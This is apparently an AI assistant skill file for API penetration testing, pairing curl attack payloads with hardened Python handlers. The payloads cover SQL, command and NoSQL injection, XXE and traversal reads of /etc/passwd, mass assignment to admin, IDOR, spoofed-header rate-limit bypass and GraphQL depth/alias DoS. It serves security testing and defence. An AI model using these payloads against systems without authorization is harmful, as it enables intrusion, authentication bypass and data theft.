# API Security Testing Skill (`testing-apis`)
You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:
- REST API security testing
- GraphQL API exploitation
- API authentication bypass
- API authorization flaws
- Rate limiting bypass
- API fuzzing
- Mass assignment vulnerabilities
- API documentation discovery
## Core Methodologies
### 1. API Discovery and Reconnaissance

**Find API Endpoints:**

```bash
# Common API paths
/api/
/api/v1/
/api/v2/
/rest/
/graphql
/swagger
/api-docs
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui/
/api/docs

# Directory fuzzing for APIs
ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403
gobuster dir -u https://target.com -w api-paths.txt

# JavaScript analysis: extract API endpoints from JS files
grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)" app.js
```

**API Documentation:**

```bash
# Swagger/OpenAPI
curl https://target.com/swagger.json
curl https://target.com/v2/swagger.json
curl https://target.com/api-docs

# Check for exposed docs
https://target.com/docs
https://target.com/api/docs
https://target.com/swagger-ui/
https://target.com/redoc
```

**Subdomain Enumeration for APIs:**

```bash
# Common API subdomains
api.target.com
api-dev.target.com
api-staging.target.com
api-prod.target.com
rest.target.com
graphql.target.com

# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt
```
### 2. REST API Testing

**HTTP Methods Testing:**

```bash
# Check all HTTP methods
curl -X GET https://api.target.com/users/1
curl -X POST https://api.target.com/users
curl -X PUT https://api.target.com/users/1
curl -X DELETE https://api.target.com/users/1
curl -X PATCH https://api.target.com/users/1
curl -I https://api.target.com/users/1        # HEAD: use -I, since -X HEAD makes curl wait for a body that never comes
curl -X OPTIONS https://api.target.com/users/1

# Check for method override
curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"
```

**Authentication Testing:**

```bash
# No authentication
curl https://api.target.com/users

# Bearer token
curl https://api.target.com/users -H "Authorization: Bearer TOKEN"

# Basic auth
curl -u username:password https://api.target.com/users

# API key (quote URLs that contain ? so the shell does not treat it as a glob)
curl "https://api.target.com/users?api_key=KEY"
curl https://api.target.com/users -H "X-API-Key: KEY"

# JWT token
curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."
```

**IDOR (Insecure Direct Object Reference):**

```bash
# Test sequential IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/100

# Test UUIDs
curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000

# Test with different users
# User A's token accessing User B's data
curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"
```

**Mass Assignment:**

```bash
# Modify request to include unexpected fields
# Original: {"username":"test","email":"test@test.com"}
# Modified: {"username":"test","email":"test@test.com","role":"admin","is_admin":true}
curl -X POST https://api.target.com/users \
  -H "Content-Type: application/json" \
  -d '{"username":"hacker","email":"hack@test.com","role":"admin","is_admin":true}'

# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance
```

**Excessive Data Exposure:**

```bash
# Check response for sensitive data
curl https://api.target.com/users | jq

# Look for:
# - Password hashes
# - Internal IDs
# - Email addresses
# - API keys
# - Tokens
# - PII
```
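Added example (not from the original skill or any project it references): the three flaws this section tests for, IDOR, mass assignment and excessive data exposure, in one minimal user-update handler written twice, first as the vulnerable shape and then hardened with an ownership check, an input allowlist and an output allowlist. The in-memory store, the `Principal` type and the field names are constructed for the demo.

```python
import copy
from dataclasses import dataclass


def fresh_db() -> dict:
    """Constructed in-memory user store; the hashes are placeholder strings."""
    return copy.deepcopy({
        1: {"id": 1, "username": "alice", "email": "alice@example.invalid",
            "role": "user", "password_hash": "$argon2id$placeholder-alice"},
        2: {"id": 2, "username": "bob", "email": "bob@example.invalid",
            "role": "user", "password_hash": "$argon2id$placeholder-bob"},
    })


@dataclass
class Principal:
    """Who is calling, as established by the authentication layer."""
    user_id: int
    role: str


class Forbidden(Exception):
    pass


# --- Vulnerable handler: the three flaws from this section, one per line ---
def update_user_vulnerable(db: dict, caller: Principal, target_id: int, body: dict) -> dict:
    user = db[target_id]   # no ownership check: any caller reaches any record (IDOR)
    user.update(body)      # every JSON key is copied, "role" included (mass assignment)
    return user            # the stored row goes back, password_hash included (data exposure)


# --- Hardened handler ---
WRITABLE_BY_SELF = {"username", "email"}             # input allowlist for the owner
WRITABLE_BY_ADMIN = WRITABLE_BY_SELF | {"role"}      # admins may also change role
PUBLIC_FIELDS = ("id", "username", "email", "role")  # output allowlist


def update_user(db: dict, caller: Principal, target_id: int, body: dict) -> dict:
    if target_id not in db:
        raise KeyError(target_id)
    # Object-level authorization: the record's owner or an admin, nobody else.
    if caller.user_id != target_id and caller.role != "admin":
        raise Forbidden(f"user {caller.user_id} may not modify user {target_id}")
    allowed = WRITABLE_BY_ADMIN if caller.role == "admin" else WRITABLE_BY_SELF
    rejected = set(body) - allowed
    if rejected:
        # Fail closed instead of silently dropping unknown keys: a client that
        # sends "role" or "is_admin" is either buggy or probing, and both belong in logs.
        raise Forbidden(f"fields not writable by this caller: {sorted(rejected)}")
    db[target_id].update(body)
    # Serialize an explicit view of the record rather than the stored row.
    return {k: db[target_id][k] for k in PUBLIC_FIELDS}
```

Rejecting unknown fields rather than ignoring them is a deliberate choice: the rejection is what makes the mass-assignment probe above visible in the application log.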
### 3. GraphQL API Testing

**GraphQL Discovery:**

```bash
# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql

# Introspection query (check if enabled)
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name } } }"}'
```

**GraphQL Introspection:**

```graphql
# Full introspection query
{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}

# Query specific type
{
  __type(name: "User") {
    name
    fields {
      name
      type {
        name
      }
    }
  }
}
```

**GraphQL Queries:**

```bash
# Basic query
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ users { id username email } }"}'

# Query with variables
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'

# Mutation
curl https://api.target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'
```

**GraphQL Vulnerabilities:**

```json
# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}

# Test for mass assignment (a selection set is required when the mutation returns an object type)
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) { id role } }"}

# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}

# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}

# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}
```
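Added example (not from the original skill): the server-side counterpart to the batch, depth and alias probes above, a small request gate that measures selection-set depth and alias count in a GraphQL document, caps JSON-array batches, and refuses introspection unless explicitly enabled. The limits (`max_depth`, `max_aliases`, `max_batch`) are constructed defaults; a production gateway would implement the same checks as validation rules on the parsed AST rather than on the raw text.

```python
import json
import re

ALIAS_RE = re.compile(r"[A-Za-z_]\w*\s*:")


def analyze_query(query: str) -> dict:
    """Measure one GraphQL document: deepest selection-set nesting and number of
    aliases. Braces inside argument lists (object literals) and inside string
    literals are not selection sets and are skipped; so are # comments."""
    depth = max_depth = paren = aliases = 0
    i, n = 0, len(query)
    while i < n:
        c = query[i]
        if c == '"':                                   # string literal, with \" escapes
            i += 1
            while i < n and query[i] != '"':
                i += 2 if query[i] == "\\" else 1
        elif c == "#":                                 # comment to end of line
            while i < n and query[i] != "\n":
                i += 1
        elif c == "(":
            paren += 1
        elif c == ")":
            paren -= 1
        elif paren == 0 and c == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif paren == 0 and c == "}":
            depth -= 1
        elif paren == 0 and (c.isalpha() or c == "_"):
            m = ALIAS_RE.match(query, i)               # `alias: field` outside arguments
            if m:
                aliases += 1
                i = m.end()
                continue
            while i < n and (query[i].isalnum() or query[i] == "_"):
                i += 1                                 # skip the rest of the identifier
            continue
        i += 1
    return {"depth": max_depth, "aliases": aliases}


def check_request(raw_body: str, max_depth: int = 5, max_aliases: int = 10,
                  max_batch: int = 5, allow_introspection: bool = False) -> list:
    """Return the reasons a gateway would reject this request body; an empty
    list means it passes. Accepts one operation object or a JSON-array batch."""
    body = json.loads(raw_body)
    ops = body if isinstance(body, list) else [body]
    problems = []
    if len(ops) > max_batch:
        problems.append(f"batch of {len(ops)} operations exceeds limit {max_batch}")
    for idx, op in enumerate(ops):
        query = op.get("query", "") if isinstance(op, dict) else ""
        stats = analyze_query(query)
        if stats["depth"] > max_depth:
            problems.append(f"op {idx}: depth {stats['depth']} exceeds {max_depth}")
        if stats["aliases"] > max_aliases:
            problems.append(f"op {idx}: {stats['aliases']} aliases exceed {max_aliases}")
        # Substring match is a demo shortcut; real gateways check the parsed document.
        if not allow_introspection and re.search(r"__schema\b|__type\s*\(", query):
            problems.append(f"op {idx}: introspection is disabled")
    return problems
```

Depth here counts the operation's own outer braces as level 1, so `{ users { id } }` has depth 2 and the nested posts/comments probe above reaches 7, which is what the default `max_depth` of 5 is meant to stop.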
### 4. Authorization Testing

**Horizontal Privilege Escalation:**

```bash
# User A trying to access User B's resources
# Get User A's token (the login endpoint expects JSON, so send the Content-Type header)
TOKEN_A=$(curl -s -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"userA","password":"passA"}' | jq -r .token)

# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"
```

**Vertical Privilege Escalation:**

```bash
# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -s -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"user","password":"pass"}' | jq -r .token)

# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"
```

**Function Level Authorization:**

```bash
# Test all endpoints with different user roles
# - Unauthenticated
# - Low-privilege user
# - Medium-privilege user
# - Admin user

# Endpoints to test
GET /api/admin/*
POST /api/admin/*
DELETE /api/admin/*
PUT /api/admin/*
```
### 5. Rate Limiting and DoS

**Test Rate Limits:**

```bash
# Rapid requests (backgrounded; print only the status code so 429s stand out, then wait for all of them)
for i in {1..1000}; do
  curl -s -o /dev/null -w "%{http_code}\n" https://api.target.com/expensive-endpoint &
done
wait

# Check response headers
curl -I https://api.target.com/endpoint

# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After
```

**Rate Limit Bypass:**

```bash
# Change IP (X-Forwarded-For, X-Real-IP)
curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4"

# Change User-Agent
curl https://api.target.com/endpoint -H "User-Agent: Different-Agent"

# Add junk parameters (quoted so the shell does not glob on ?)
curl "https://api.target.com/endpoint?random=123"
curl "https://api.target.com/endpoint?random=456"

# Case manipulation
curl https://api.target.com/Endpoint
curl https://api.target.com/ENDPOINT
```
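Added example (not from the original skill): the server-side logic that makes each bypass above ineffective. `client_ip` only honours `X-Forwarded-For` when the TCP peer is one of the operator's own proxies and then walks the header from the right, so a value the client prepended is never used as the key; `rate_limit_key` keys on the matched route rather than the raw URL, so junk query parameters and path-case variants share one bucket; `TokenBucket` enforces the limit and emits the `X-RateLimit-*` / `Retry-After` headers the section tells testers to look for. The proxy range and all addresses are constructed.

```python
import ipaddress
import math
import time
from typing import Dict, Optional, Tuple

# Constructed: the address range of your own load balancer / CDN tier. Only
# these peers are allowed to speak for someone else via X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _trusted(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, forwarded_for: Optional[str]) -> str:
    """Derive the client address a rate limiter should key on.

    If the TCP peer is not a trusted proxy, the header is client-supplied and
    ignored. Otherwise walk X-Forwarded-For right to left, dropping trusted
    proxy hops; the first untrusted hop is the real client. Anything the
    client prepended itself sits further left and is never reached."""
    if not _trusted(ipaddress.ip_address(remote_addr)) or not forwarded_for:
        return remote_addr
    hops = [h.strip() for h in forwarded_for.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr            # malformed header: fall back to the peer
        if not _trusted(addr):
            return str(addr)
    return remote_addr                    # every hop was a proxy; use the peer


class TokenBucket:
    """Per-key token bucket that also produces the standard rate-limit headers."""

    def __init__(self, capacity: int, refill_per_sec: float, clock=time.monotonic):
        self.capacity = capacity
        self.rate = refill_per_sec
        self.clock = clock                # injectable for deterministic tests
        self.state: Dict[str, Tuple[float, float]] = {}   # key -> (tokens, last_seen)

    def allow(self, key: str) -> Tuple[bool, Dict[str, str]]:
        now = self.clock()
        tokens, last = self.state.get(key, (float(self.capacity), now))
        tokens = min(float(self.capacity), tokens + (now - last) * self.rate)
        allowed = tokens >= 1.0
        if allowed:
            tokens -= 1.0
        self.state[key] = (tokens, now)
        headers = {"X-RateLimit-Limit": str(self.capacity),
                   "X-RateLimit-Remaining": str(int(tokens))}
        if not allowed:
            headers["Retry-After"] = str(math.ceil((1.0 - tokens) / self.rate))
        return allowed, headers


def rate_limit_key(remote_addr: str, headers: Dict[str, str], route: str) -> str:
    """Key on the derived client address and the matched route (as the router
    resolved it), not the raw URL, so ?random=123 and /ENDPOINT do not open new buckets."""
    xff = {k.lower(): v for k, v in headers.items()}.get("x-forwarded-for")
    return f"{client_ip(remote_addr, xff)}:{route}"
```

Note that `X-Real-IP` and `X-Originating-IP` are not consulted at all; a proxy that sets one of them should be configured to overwrite, not append, and the application should read exactly the header its own proxy tier is known to set.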
### 6. API Fuzzing

**Parameter Fuzzing:**

```bash
# ffuf for parameter discovery
ffuf -u "https://api.target.com/endpoint?FUZZ=test" -w parameters.txt

# Arjun
arjun -u https://api.target.com/endpoint

# Test various inputs (quote the URL: unquoted < > ' and ? are interpreted by the shell,
# and -G --data-urlencode lets curl percent-encode values that contain spaces or quotes)
curl "https://api.target.com/users?id=1"
curl "https://api.target.com/users?id=../../etc/passwd"
curl -G --data-urlencode "id=<script>alert(1)</script>" https://api.target.com/users
curl -G --data-urlencode "id=' OR '1'='1" https://api.target.com/users
```

**Fuzzing with wfuzz:**

```bash
# POST data fuzzing
wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login

# Header fuzzing
wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint
```

**Content-Type Confusion:**

```bash
# Try different content types
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/json" \
  -d '{"user":"admin"}'

curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/xml" \
  -d '<user>admin</user>'

curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'user=admin'

# Send JSON to XML endpoint and vice versa
```
### 7. API Security Tools

**Burp Suite:**

```bash
# Send requests to Repeater for manual testing
# Use Intruder for fuzzing
# Scan with active/passive scanner
# Use extensions: Autorize, AuthMatrix, JWT4B
```

**Postman:**

```bash
# Import API collection
# Test all endpoints
# Use environment variables for tokens
# Create test scripts
# Export collection for collaboration
```

**OWASP ZAP:**

```bash
# Automated API scan
zap-cli quick-scan https://api.target.com

# Spider API
zap-cli spider https://api.target.com

# Active scan
zap-cli active-scan https://api.target.com
```

**API-specific Tools:**

```bash
# RESTler (Microsoft) - REST API fuzzer
git clone https://github.com/microsoft/restler-fuzzer
# After building per the project README, compile the spec into a fuzzing grammar with the Restler binary
<restler_dest_dir>/restler/Restler compile --api_spec swagger.json

# Kiterunner - API endpoint discovery
kr scan https://target.com -w routes.txt

# Nuclei with API templates
nuclei -u https://api.target.com -t ~/nuclei-templates/api/
```
### 8. API Injection Attacks

**SQL Injection:**

```bash
# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"

# In JSON body (the body is double-quoted so the single quotes inside the JSON string
# survive; \' is not an escape inside a single-quoted shell string)
curl -X POST https://api.target.com/search \
  -H "Content-Type: application/json" \
  -d "{\"query\":\"test' OR '1'='1\"}"
```

**Command Injection:**

```bash
# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"

# In JSON
curl -X POST https://api.target.com/diagnostic \
  -H "Content-Type: application/json" \
  -d '{"command":"ping;whoami"}'
```

**NoSQL Injection:**

```bash
# MongoDB injection
curl -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":{"$ne":null},"password":{"$ne":null}}'

curl -X POST https://api.target.com/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$regex":".*"}}'
```
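Added example (not from the original skill): why the two MongoDB payloads above work and what closes them. `login_vulnerable` passes the decoded JSON straight into the query filter, so an operator object such as `{"$ne": null}` takes the place of the expected string; `login` enforces scalar types before anything reaches the query, looks up by username only, and compares a password hash in constant time. The collection is a tiny in-memory stand-in implementing just the filter operators the payloads use, and the credentials and salt are constructed.

```python
import hashlib
import hmac
import re
from typing import Optional

SALT = b"constructed-demo-salt"       # constructed; real code stores a random per-user salt


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


# Constructed stand-in for a MongoDB "users" collection. The clear-text
# "password" field exists only so the vulnerable handler behaves like the apps
# the payloads above are written for; the hardened handler never reads it.
USERS = [{"username": "admin", "password": "correct horse",
          "password_hash": _hash("correct horse")}]


def _matches(value, condition) -> bool:
    """Just enough MongoDB filter semantics for the demo: equality, $ne, $regex."""
    if isinstance(condition, dict):
        for op, arg in condition.items():
            if op == "$ne":
                if value == arg:
                    return False
            elif op == "$regex":
                if not isinstance(value, str) or not re.search(arg, value):
                    return False
            else:
                raise ValueError(f"unsupported operator {op}")
        return True
    return value == condition


def find_one(filter_: dict) -> Optional[dict]:
    for doc in USERS:
        if all(_matches(doc.get(k), v) for k, v in filter_.items()):
            return doc
    return None


def login_vulnerable(body: dict) -> Optional[str]:
    """Decoded JSON goes straight into the filter, so a client can substitute
    operator objects for the strings the code expects."""
    doc = find_one({"username": body["username"], "password": body["password"]})
    return doc["username"] if doc else None


def login(body: dict) -> Optional[str]:
    """Hardened: enforce scalar types before they touch the query, look up by
    username only, and compare the password hash in constant time."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise TypeError("username and password must be strings")   # -> HTTP 400
    doc = find_one({"username": username})
    if doc is None:
        _hash(password)        # spend the same time for unknown users as for known ones
        return None
    if not hmac.compare_digest(_hash(password), doc["password_hash"]):
        return None
    return doc["username"]
```

The type check is the part that matters for injection: the query never sees a dict where a string belongs, and the password is never part of the query at all, which also removes the `$regex` oracle.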
**XXE in XML APIs:**

```bash
# If API accepts XML
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user><name>&xxe;</name></user>'
```
### 9. API Documentation Analysis

**Swagger/OpenAPI Analysis:**

```bash
# Download spec
curl -s https://api.target.com/swagger.json -o swagger.json

# Analyze with jq
jq '.paths' swagger.json
jq '.definitions' swagger.json            # Swagger 2.0 schemas
jq '.components.schemas' swagger.json     # OpenAPI 3.x equivalent

# Extract all endpoints
jq -r '.paths | keys[]' swagger.json

# Find parameters (GET operations shown; substitute .post, .put, ... for the others)
jq '.paths[].get.parameters' swagger.json
```
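Added example (not from the original skill): the same analysis done programmatically, so it can run over a whole spec instead of one jq expression at a time. It flattens every operation, flags operations with no security requirement (either nothing declared or an explicit `security: []`), lists paths that take an object identifier (the IDOR candidates from section 2) and scans schema properties for the mass-assignment and data-exposure field names listed earlier in this skill. The `SAMPLE_SPEC` document is constructed to stand in for a downloaded `swagger.json`; the functions handle both the Swagger 2.0 `definitions` and the OpenAPI 3 `components.schemas` layout.

```python
import json
import re

HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options", "trace"}
# Property names worth a second look, from the mass-assignment and
# data-exposure lists in section 2 of this skill.
SENSITIVE_FIELDS = {"role", "is_admin", "isAdmin", "admin", "user_level", "permissions",
                    "credits", "balance", "password", "password_hash", "api_key", "apiKey", "token"}
ID_PARAM_RE = re.compile(r"\{(id|\w+(?:Id|_id|ID))\}")

# Constructed OpenAPI 3 document standing in for a downloaded swagger.json.
SAMPLE_SPEC = r"""
{
  "openapi": "3.0.3",
  "security": [{"bearerAuth": []}],
  "paths": {
    "/users": {"get": {"summary": "List users"}},
    "/users/{id}": {
      "parameters": [{"name": "id", "in": "path", "required": true}],
      "get": {"summary": "Fetch a user"},
      "patch": {"summary": "Update a user",
                "requestBody": {"content": {"application/json": {"schema": {"$ref": "#/components/schemas/User"}}}}}
    },
    "/admin/users/{userId}": {"delete": {"parameters": [{"name": "userId", "in": "path"}]}},
    "/health": {"get": {"security": []}}
  },
  "components": {
    "securitySchemes": {"bearerAuth": {"type": "http", "scheme": "bearer"}},
    "schemas": {"User": {"properties": {"id": {}, "username": {}, "email": {}, "role": {}, "password_hash": {}}}}
  }
}
"""


def load_operations(spec: dict) -> list:
    """Flatten paths into one record per operation. Swagger 2.0 and OpenAPI 3
    share the paths / parameters / security layout used here."""
    global_security = spec.get("security")   # absent = nothing declared, [] = explicitly none
    ops = []
    for path, item in spec.get("paths", {}).items():
        shared = item.get("parameters", [])  # path-level parameters apply to every operation
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue
            params = shared + op.get("parameters", [])
            security = op.get("security", global_security)  # operation overrides global
            ops.append({
                "method": method.upper(),
                "path": path,
                "params": [(p.get("in"), p.get("name")) for p in params],
                "authenticated": bool(security),   # None and [] both mean no requirement
                "id_params": ID_PARAM_RE.findall(path),
            })
    return ops


def schema_fields(spec: dict) -> dict:
    """Schema name -> sorted property names, for Swagger 2.0 `definitions` as
    well as OpenAPI 3 `components.schemas`."""
    schemas = spec.get("definitions") or spec.get("components", {}).get("schemas", {})
    return {name: sorted(s.get("properties", {})) for name, s in schemas.items()}


def report(spec: dict) -> dict:
    ops = load_operations(spec)
    fields = schema_fields(spec)
    return {
        "endpoints": [f"{o['method']} {o['path']}" for o in ops],
        "unauthenticated": [f"{o['method']} {o['path']}" for o in ops if not o["authenticated"]],
        "object_id_paths": [f"{o['method']} {o['path']}" for o in ops if o["id_params"]],
        "sensitive_fields": {name: [f for f in props if f in SENSITIVE_FIELDS]
                             for name, props in fields.items() if set(props) & SENSITIVE_FIELDS},
    }


if __name__ == "__main__":
    print(json.dumps(report(json.loads(SAMPLE_SPEC)), indent=2))
```

To run it over a real download, replace `SAMPLE_SPEC` with the contents of `swagger.json`. Operations that report as unauthenticated and also take an id parameter are the first ones to check under section 2.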
### 10. API Security Checklist

**Authentication:**
- Test without authentication
- Test with invalid tokens
- Test with expired tokens
- Test token in URL vs header
- Check for authentication bypass

**Authorization:**
- Test IDOR vulnerabilities
- Test horizontal privilege escalation
- Test vertical privilege escalation
- Test function-level authorization
- Test missing authorization checks

**Input Validation:**
- Test SQL injection
- Test NoSQL injection
- Test command injection
- Test XXE
- Test XSS in API responses

**Business Logic:**
- Test mass assignment
- Test excessive data exposure
- Test rate limiting
- Test resource exhaustion
- Test business logic flaws

**Configuration:**
- Check for exposed documentation
- Check security headers
- Check CORS configuration
- Check error messages (info disclosure)
- Check debug endpoints
## Quick Testing Commands

**Test Endpoint:**

```bash
# GET request
curl -v https://api.target.com/endpoint

# POST with JSON
curl -X POST https://api.target.com/endpoint \
  -H "Content-Type: application/json" \
  -d '{"key":"value"}'

# With authentication
curl https://api.target.com/endpoint \
  -H "Authorization: Bearer TOKEN"

# See full response (headers and body)
curl -i https://api.target.com/endpoint
```
## Troubleshooting

**CORS Issues:**

```bash
# Check CORS headers (-i prints the response headers, which is where the CORS grant lives)
curl -i -H "Origin: https://evil.com" https://api.target.com/endpoint

# Look for:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Origin: https://evil.com   (the supplied origin reflected back)
# Access-Control-Allow-Credentials: true
```
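Added example (not from the original skill): a small classifier for the response headers the check above produces, run against the `Origin` that was sent. It distinguishes a wildcard grant from a reflected untrusted origin, treats reflection plus `Access-Control-Allow-Credentials: true` as the serious case (authenticated responses readable cross-site), and also notes a reflected origin served without `Vary: Origin`, which lets one origin's grant be cached for another. `TRUSTED_ORIGINS` is a constructed allowlist.

```python
from typing import Dict, List

TRUSTED_ORIGINS = {"https://app.example.invalid"}   # constructed allowlist of your own front-ends


def assess_cors(request_origin: str, response_headers: Dict[str, str]) -> List[str]:
    """Return finding codes for one response to a request carrying `Origin`.
    Header names are matched case-insensitively; an empty list means nothing
    cross-site-readable was granted to an untrusted origin."""
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    vary_origin = "origin" in h.get("vary", "").lower()
    findings = []
    if acao is None:
        return findings                    # no grant at all: browsers block cross-origin reads
    if acao == "*":
        findings.append("wildcard-origin")           # fine for public data only
        if creds:
            findings.append("wildcard-with-credentials")   # browsers refuse it, but it signals misconfiguration
    elif acao == "null":
        findings.append("null-origin-allowed")       # sandboxed iframes and data: URLs can send Origin: null
    elif acao == request_origin and request_origin not in TRUSTED_ORIGINS:
        findings.append("untrusted-origin-reflected")
        if creds:
            findings.append("reflected-origin-with-credentials")
        if not vary_origin:
            findings.append("missing-vary-origin")   # shared caches may serve this grant to other origins
    return findings
```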
**Rate Limited:**

```bash
# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done

# Try bypass techniques (X-Forwarded-For, etc.)
```
## Reference Links
- OWASP API Security Top 10: https://owasp.org/www-project-api-security/
- HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
- API Security Best Practices: https://github.com/OWASP/API-Security
- PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
## When to Use This Skill
Activate this skill when the user asks to:
- Test REST or GraphQL APIs
- Find API vulnerabilities
- Bypass API authentication/authorization
- Discover API endpoints
- Test API business logic
- Perform API fuzzing
- Analyze API documentation
- Help with API penetration testing
Always ensure proper authorization before testing any API.